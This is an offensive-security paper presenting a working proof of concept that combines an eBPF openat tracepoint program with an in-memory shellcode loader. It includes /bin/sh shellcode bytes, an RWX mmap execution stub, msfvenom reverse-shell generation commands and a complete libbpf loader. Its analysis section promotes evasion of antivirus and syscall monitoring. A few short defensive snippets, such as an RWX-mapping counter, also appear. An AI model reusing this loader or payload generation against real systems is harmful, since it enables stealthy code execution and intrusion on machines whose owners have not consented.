Introduction

In recent years, the Extended Berkeley Packet Filter (eBPF) has emerged as a very powerful technology within the Linux kernel, allowing the efficient and secure execution of custom programs directly in the kernel, without the need to modify its source code. Originally created for packet filtering, eBPF has evolved into a highly versatile observability, security and automation platform.

In parallel, shellcode remains a classic and yet extremely relevant technique within the offensive security “arsenal”. Shellcodes are compact snippets of machine code that perform a specific action, often used to obtain remote shells, escalate privileges or exploit flaws.

In this paper, we explore the integration between eBPF and shellcode loaders, a field that has not been explored much. The idea is to use eBPF to monitor system events (such as syscalls) and, from there, execute shellcode directly in user-land memory. This approach provides a stealthy means of executing malicious code, taking advantage of the low overhead of eBPF and the difficulty of detecting dynamically injected shellcode.

The purpose of this paper is to demonstrate a functional proof of concept of how this can be done, explaining each part of the process!

1 - Objective

The main objective of this paper is to demonstrate a practical approach for integrating kernel-land and user-land, through two central points:

Interception of syscalls with eBPF -> code an eBPF program attached to a kernel tracepoint to capture specific events, in this case, the openat() syscall. This allows real-time monitoring of system activity, without significant performance impact, and with isolation guaranteed by the eBPF sandbox.
Loading and executing shellcode in memory in user-land -> after activation via kernel event, the program in user-land is responsible for loading a shellcode previously compiled for the x86_64 architecture into an executable region of memory, using mmap() (we will talk more about it later in this same paper). The shellcode is then executed directly in memory, eliminating the need for temporary files or other detectable artifacts.

2 - Fundamentals

2.1 - eBPF

eBPF (Extended Berkeley Packet Filter) is a Linux kernel technology that allows the safe execution of bytecode programs within the kernel itself, in an isolated and controlled manner. Originally designed for network packet filtering, eBPF has evolved into a generalized platform capable of monitoring and changing the behavior of the operating system in real time, without the need to modify or restart the kernel.

eBPF programs are written in a restricted language (usually C compiled to BPF bytecode via LLVM/Clang) and loaded into the kernel using the bpf() syscall or libraries such as libbpf. Before execution, this bytecode goes through a rigorous verification process to ensure that it does not cause instability or compromise the kernel (for example, rejecting unbounded loops and invalid memory accesses).

eBPF programs can be attached to various points in the kernel, such as tracepoints, kprobes, uprobes, cgroups, sockets, etc., allowing the capture and manipulation of system events!

tracepoints (sys_enter_openat in this case)

In the example of this paper, we use a kernel tracepoint called sys_enter_openat, which is triggered every time a process executes the openat() syscall. This tracepoint provides access to the syscall arguments (such as the path of the file being opened) at the time of invocation.

Attaching an eBPF program to this tracepoint allows you to intercept this information efficiently and safely, enabling, for example, detailed monitoring of file activity in real time!

eBPF isolation

eBPF programs run in a sandbox, without direct access to critical kernel structures. This reduces the risk of failures and maintains system stability, while allowing tools to monitor and interact with the kernel safely and effectively.

2.2 - Shellcode

Shellcode is a piece of code that does something specific when executed, usually used in exploits to open a shell, execute commands or download payloads. Despite the name, not all shellcode opens a shell. It may simply create files, connect to the network or execute any other valid instructions.

How the hell is it executed?

Shellcode is usually injected and executed in memory, so the process is basically:

1 -> allocate memory with execution permission (for example: mmap() with PROT_EXEC, or a page-aligned allocation + mprotect(), since mprotect() only works on whole pages)
2 -> copy the shellcode to this memory
3 -> create a function that points to the shellcode and call it

Well, to exemplify, here is a very simple C code that invokes a sh shell through a shellcode:

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

unsigned char shellcode[] = {
  0x48, 0x31, 0xc0, 0x48, 0x89, 0xc2, 0x48, 0x89, 0xc6, 0x48, 0x8d, 0x3d, 0x04, 0x00, 0x00, 0x00, 0xb0, 0x3b, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
};

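int main(void) {
    /* anonymous page that is readable, writable and executable */
    void *mem = mmap(NULL, 4096,
                     PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_ANON | MAP_PRIVATE, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy(mem, shellcode, sizeof(shellcode));
    /* treat the buffer as a function and jump to it */
    ((void(*)())mem)();
    return 0;
}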

Generation with msfvenom:

A quick, practical way to generate shellcode is msfvenom, from Metasploit. Here are some examples.

Generate shellcode for a reverse shell on x86_64:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -f c

This generates the shellcode in C format, ready to be copied directly into the code. You can also generate a “pure” binary shellcode like this:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -f raw -o pwnbuffer.bin

2.3 - Loader integration

Now, we raise a question: why use mmap() with PROT_EXEC? In a straightforward way, we need a memory region that can execute code. mmap() with PROT_READ | PROT_WRITE | PROT_EXEC allows us to allocate space where we copy the shellcode and can execute it directly in RAM!

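On kernels older than 5.11, the memory used by eBPF maps and programs is charged against RLIMIT_MEMLOCK, the limit on how much memory a process can lock (keep out of swap). If that limit is too low, bpf() fails with EPERM, so we raise it with:

struct rlimit r = {RLIM_INFINITY, RLIM_INFINITY};
setrlimit(RLIMIT_MEMLOCK, &r);

Without this, the loader may not even be able to load the eBPF program on those kernels. From 5.11 onwards the kernel accounts eBPF memory through memory cgroups instead, so the call is harmless but no longer required.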
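Before raising the limit, it can be useful to see what it currently is. The following is a minimal sketch, not part of the original loader, that reads RLIMIT_MEMLOCK with getrlimit(); the helper names get_memlock_limit() and print_limit() are made up for this example.

```c
#include <stdio.h>
#include <sys/resource.h>

/* Read the current RLIMIT_MEMLOCK soft and hard limits.
 * Returns 0 on success, -1 on failure (errno is set by getrlimit). */
int get_memlock_limit(rlim_t *soft, rlim_t *hard)
{
    struct rlimit r;

    if (getrlimit(RLIMIT_MEMLOCK, &r) != 0)
        return -1;
    *soft = r.rlim_cur;
    *hard = r.rlim_max;
    return 0;
}

/* Print one limit, spelling out RLIM_INFINITY instead of a huge number. */
void print_limit(const char *label, rlim_t value)
{
    if (value == RLIM_INFINITY)
        printf("%s: unlimited\n", label);
    else
        printf("%s: %llu bytes\n", label, (unsigned long long)value);
}
```

Calling get_memlock_limit() from main() and passing both values to print_limit() shows whether the soft limit is small enough to matter. Keep in mind that raising the hard limit, as the setrlimit() call above does, normally requires root or CAP_SYS_RESOURCE.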

3 - Implementation

3.1 - eBPF Code (kernel-land)

The following C code defines the eBPF program that will be loaded into the kernel and attached to the sys_enter_openat tracepoint. This tracepoint is triggered whenever a process executes the openat() syscall, which is used internally by functions such as open() and fopen().

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/ptrace.h>
#include <linux/types.h>
#include <linux/stat.h>

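/* Layout mirrors /sys/kernel/debug/tracing/events/syscalls/sys_enter_openat/format
 * on x86_64; check that file on the target kernel before relying on it. */
struct trace_event {
    __u64           pad;         /* common_* fields (8 bytes) */
    int             syscall_nr;  /* offset 8, followed by 4 bytes of padding */
    long            dfd;         /* offset 16 */
    const char     *filename;    /* offset 24 */
    long            flags;       /* offset 32 */
    long            mode;        /* offset 40 */
};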

char LICENSE[] SEC("license") = "GPL";

SEC("tracepoint/syscalls/sys_enter_openat")
int trace_openat(struct trace_event *ctx)
{
    char first_byte = 0;
    bpf_probe_read_user(&first_byte,
                       sizeof(first_byte),
                       ctx->filename);

    bpf_printk("PWNED!! %c\n", first_byte);
    return 0;
}

“What does the code do?”

intercepts calls to openat()
reads the first character of the file name being opened
uses bpf_printk() to log to /sys/kernel/debug/tracing/trace_pipe

So, this allows you to monitor in real time what is being accessed by the system without invasive hooks!
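The context struct only works if its fields sit at the same offsets as the record the kernel hands to the program. Here is a minimal user-space sketch, not part of the original project, that mirrors that record and checks the offsets at compile time. The struct name openat_record and the helper openat_filename_offset() are hypothetical. The offsets (dfd at 16, filename at 24, flags at 32, mode at 40) are what the format file under /sys/kernel/debug/tracing/events/syscalls/sys_enter_openat/ typically reports on x86_64, so treat them as an assumption and confirm them on your own kernel.

```c
#include <stddef.h>

/* Hypothetical user-space mirror of the sys_enter_openat record (LP64 assumed). */
struct openat_record {
    unsigned long long common;     /* common_type/flags/preempt_count/pid: 8 bytes */
    int                syscall_nr; /* offset 8, then 4 bytes of padding */
    long               dfd;        /* each syscall argument occupies 8 bytes */
    const char        *filename;
    long               flags;
    long               mode;
};

/* Compile-time checks: the build fails if the layout drifts from the assumed one. */
_Static_assert(offsetof(struct openat_record, dfd) == 16, "dfd offset");
_Static_assert(offsetof(struct openat_record, filename) == 24, "filename offset");
_Static_assert(offsetof(struct openat_record, flags) == 32, "flags offset");
_Static_assert(offsetof(struct openat_record, mode) == 40, "mode offset");

/* Offset an eBPF program would read the filename pointer from. */
size_t openat_filename_offset(void)
{
    return offsetof(struct openat_record, filename);
}
```

If a struct places filename at any other offset, bpf_probe_read_user() ends up reading from a value that is not the path pointer, and the logged byte stays 0.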

3.2 - Code loader (user-land)

The loader is the user-land program responsible for loading the eBPF into the kernel, and then, loading and executing a shellcode directly from memory! Here is the loader code in C:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <bpf/libbpf.h>

static void bump_memlock_rlimit(void)
{
    struct rlimit r = { RLIM_INFINITY, RLIM_INFINITY };
    if (setrlimit(RLIMIT_MEMLOCK, &r)) {
        perror("setrlimit(RLIMIT_MEMLOCK)");
        exit(1);
    }
}

static void *load_shellcode(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (!f) {
        perror("fopen(shellcode)");
        exit(1);
    }
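    if (fseek(f, 0, SEEK_END) != 0) {
        perror("fseek(shellcode)");
        fclose(f);
        exit(1);
    }
    /* ftell() returns -1 on error; mmap() rejects a length of 0 */
    long len = ftell(f);
    if (len <= 0) {
        fprintf(stderr, "Error: shellcode file is empty or unreadable\n");
        fclose(f);
        exit(1);
    }
    size_t size = (size_t)len;
    rewind(f);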

    void *mem = mmap(NULL,
                     size,
                     PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_ANONYMOUS | MAP_PRIVATE,
                     -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        fclose(f);
        exit(1);
    }

    if (fread(mem, 1, size, f) != size) {
        perror("fread(shellcode)");
        munmap(mem, size);
        fclose(f);
        exit(1);
    }
    fclose(f);
    return mem;
}

int main(int argc, char **argv)
{
    struct bpf_object *obj;
    struct bpf_program *prog;
    struct bpf_link *link;
    int err;

    bump_memlock_rlimit();
    obj = bpf_object__open_file("ebpf_prog.o", NULL);
    if (!obj) {
        fprintf(stderr, "Error: Failed to open ebpf_prog.o\n");
        return 1;
    }
    err = bpf_object__load(obj);
    if (err) {
        fprintf(stderr, "Error: Failed to load eBPF object: %d\n", err);
        return 1;
    }

    bpf_object__for_each_program(prog, obj) {
        link = bpf_program__attach(prog);
        if (!link) {
            fprintf(stderr, "Error: Failed to attach eBPF program\n");
            return 1;
        }
    }

    printf("[+] eBPF loading and attached (tracepoint/syscalls:sys_enter_openat)\n");
    void (*shellcode_func)() = load_shellcode("shellcode.bin");
    printf("[+] Executing shellcode in memory...\n");
    shellcode_func();

    return 0;
}

But… what does the loader do?

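raises the RLIMIT_MEMLOCK limit, which could otherwise prevent eBPF from loading
opens the compiled file ebpf_prog.o with bpf_object__open_file() and loads it into the kernel with bpf_object__load()
attaches the eBPF program to the sys_enter_openat tracepoint via bpf_program__attach()
allocates an anonymous region with mmap() and PROT_EXEC permissions, then reads the binary shellcode from a file into it
and finally, executes the shellcode immediately from memory

Note that in this proof of concept the shellcode runs right after the eBPF program is attached. The loader does not wait for an openat() event before calling it.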

If everything goes well, the terminal will display something like:

[+] eBPF loading and attached (tracepoint/syscalls:sys_enter_openat)
[+] Executing shellcode in memory...
PWNED BY SLAYER%

The GitHub repository is linked at the end of this paper. Take a look at it for more information and for help with running the code.

4 - Security Analysis

Using eBPF as part of a tool for loading and executing shellcode is an innovative approach in the offsec area. By pairing code that runs inside the kernel with common techniques for injecting and executing arbitrary code, the pentester gains a sophisticated way to achieve their goals with discretion and efficiency. However, this approach comes with limitations that need to be understood before its practical application!

Advantages:

1 - Direct memory execution: the shellcode is read directly from a binary file (shellcode.bin) and mapped to memory using the mmap() function with PROT_EXEC permissions. This means that the code never touches the disk in executable format, considerably reducing the chance of being detected by traditional antiviruses or by tools that monitor temporary executable files. Furthermore, the shellcode is executed through a direct call (function pointer), which avoids the use of common syscalls (such as execve) to start a new process, making it difficult to identify by tools that monitor syscalls.
2 - Smaller footprint: the user-land loader is extremely simple and small. It only loads the eBPF program and maps the shellcode into memory. This means that the binary can go unnoticed in heuristic scans, since its structure does not contain common malware functions, such as network communication, suspicious embedded strings or unusual API calls.
3 - Stealth via kernel-land: using eBPF as an entry point means that the kernel is cooperating in the execution, without the need for more obvious techniques such as LD_PRELOAD, ptrace injection, or modifications to user libraries. Additionally, intercepting syscalls (such as openat) via tracepoint means that legitimate user actions (such as opening files in the terminal) could serve as natural triggers for shellcode activation, although the loader shown above runs the shellcode immediately rather than waiting for such an event.

Limitations:

1 - Elevated permissions (root): to load eBPF programs and raise RLIMIT_MEMLOCK, you must be root or hold capabilities such as CAP_SYS_ADMIN (or CAP_BPF together with CAP_PERFMON on kernel 5.8 and later). In real environments this limits the technique to post-exploitation, where privilege escalation has already occurred.
2 - Visibility in trace_pipe: even if the payload is discreet, using bpf_printk() sends messages to /sys/kernel/debug/tracing/trace_pipe. If an analyst is monitoring the trace_pipe, they can see the strings and identify the activity.
3 - System resource dependency: The loader depends on specific kernel headers and libbpf, which can cause compatibility issues or make detection easier in protected environments.
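One more artifact is worth keeping in mind: the region the loader maps with PROT_READ | PROT_WRITE | PROT_EXEC appears in /proc/<pid>/maps with rwxp permissions for as long as the process lives. The sketch below, which is not part of the original project, shows how such mappings could be counted from the defender's side. The function names is_rwx_mapping() and count_rwx_mappings() are hypothetical, and the parsing assumes the usual "start-end perms offset dev inode [path]" line format.

```c
#include <stdio.h>
#include <string.h>

/* Return 1 if one /proc/<pid>/maps line describes a mapping that is
 * readable, writable and executable at once, 0 otherwise. */
int is_rwx_mapping(const char *line)
{
    char perms[5] = {0};

    /* Skip the address range, then read the 4-character permission field. */
    if (sscanf(line, "%*s %4s", perms) != 1)
        return 0;
    return perms[0] == 'r' && perms[1] == 'w' && perms[2] == 'x';
}

/* Count RWX mappings listed in a maps file.
 * Returns -1 if the file cannot be opened. */
int count_rwx_mappings(const char *maps_path)
{
    char line[512];
    int count = 0;
    int at_line_start = 1;
    FILE *f = fopen(maps_path, "r");

    if (!f)
        return -1;
    while (fgets(line, sizeof(line), f)) {
        /* Only parse chunks that begin a line; very long paths span chunks. */
        if (at_line_start)
            count += is_rwx_mapping(line);
        at_line_start = strchr(line, '\n') != NULL;
    }
    fclose(f);
    return count;
}
```

Calling count_rwx_mappings("/proc/self/maps"), or the same with the PID of a suspicious process, gives a quick signal. JIT runtimes can also create RWX regions, so a non-zero count is a hint rather than proof.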

Conclusion!

The combination of eBPF and shellcode loaders demonstrates how it is possible to take advantage of more advanced mechanisms of the Linux kernel to execute code in a discreet and controlled manner. With eBPF, we intercept system calls directly in the kernel, activating custom routines without modifying files on disk or relying on traditional hooks. By loading the shellcode into memory with mmap() and execution permissions, we ensure that the execution occurs entirely in user-land, without leaving obvious traces in the system. This technique offers advantages such as a smaller footprint, direct execution from memory and activation based on REAL system events. Although it requires elevated permissions such as root, and can be monitored with appropriate tools, it exemplifies the potential of eBPF not only as an observability and security tool, but also as a mechanism for automation and control of execution flows.

Source github

ebpf_loader - github

Shellcode Loader with eBPF

Sources used to build this article